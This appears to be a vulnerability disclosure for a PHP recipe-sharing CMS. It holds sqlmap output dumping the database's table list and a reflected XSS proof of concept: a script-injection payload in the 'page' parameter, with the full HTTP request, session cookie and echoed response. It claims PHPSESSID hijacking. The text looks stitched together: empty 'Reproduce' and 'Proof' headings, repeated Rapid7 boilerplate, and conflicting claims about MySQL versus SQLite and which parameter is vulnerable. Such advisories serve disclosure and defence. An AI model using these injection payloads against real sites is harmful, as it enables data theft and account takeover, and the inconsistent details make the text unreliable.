'C:\Users\venvaropt\AppData\Local\sqlmap\output\192.168.1.180\dump\SQLite_masterdb\category_list.csv' [15:54:53] [INFO] fetching columns for table 'sqlite_sequence' [15:54:53] [INFO] fetching entries for table 'sqlite_sequence' Database: <current> Table: sqlite_sequence [5 entries] +-----+---------------+ | seq | name | +-----+---------------+ | 2 | admin_list | | 5 | category_list | | 4 | user_list | | 3 | recipe_list | | 7 | comment_list | +-----+---------------+ [15:54:53] [INFO] table 'SQLite_masterdb.sqlite_sequence' dumped to CSV file 'C:\Users\venvaropt\AppData\Local\sqlmap\output\192.168.1.180\dump\SQLite_masterdb\sqlite_sequence.csv' [15:54:53] [INFO] fetched data logged to text files under 'C:\Users\venvaropt\AppData\Local\sqlmap\output\192.168.1.180' [*] ending @ 15:54:53 /2021-09-29/
XSS Vulnerability Description:
The value of the page request parameter on Recipe Sharing Website – CMS (by:oretnom23) is copied into the HTML document as text between TITLE tags. The payload n0gg2</title><script>alert(1)</script>pfcjm was submitted in the page parameter. This input was echoed unmodified in the application’s response. The attacker can take control of some of the accounts by using the PHPSESSID Hijacking method attack. The vulnerable parameter is fullname from login_registration app.
- XSS Request:
GET /recipe_site/?page=view_recipen0gg2%3c%2ftitle%3e%3cscript%3ealert(1)%3c%2fscript%3epfcjm&rid=2 HTTP/1.1 Host: 192.168.1.180 Cookie: PHPSESSID=pbvnfsmuchv0ri90bteh2bl3r6 Upgrade-Insecure-Requests: 1 Referer: http://192.168.1.180/recipe_site/?page=recipe&cid=3 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en-US,en-GB;q=0.9,en;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Connection: close Cache-Control: max-age=0
- XSS Response:
HTTP/1.1 200 OK Date: Wed, 29 Sep 2021 07:50:33 GMT Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/7.4.22 X-Powered-By: PHP/7.4.22 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Content-Length: 7630 Connection: close Content-Type: text/html; charset=UTF-8 <br /> <b>Warning</b>: SQLite3::exec(): database is locked in <b>C:\xampp\htdocs\recipe_site\DBConnection.php</b> on line <b>76</b><br /> <br /> <b>Warning</b>: SQLite3::exec(): database is locked i ...[SNIP]... <title>View Recipen0gg2</title><script>alert(1)</script>pfcjm | Try My Recipe</title> ...[SNIP]...
Reproduce:
Proof MySQL Injection:
Proof XSS-Stored Hijacking PHPSESSID:
General Information
References
Exploit
The following exploit POCs have not been verified by Rapid7 researchers, but are sourced from:
nomi-sec/PoC-in-GitHub.
Additional sources will be added here as they become relevant.
Notes: We will only add the top 3 POCs for a given CVE. POCs added here must have at least 2 GitHub stars.
Additional sources will be added here as they become relevant.
Notes: We will only add the top 3 POCs for a given CVE. POCs added here must have at least 2 GitHub stars.
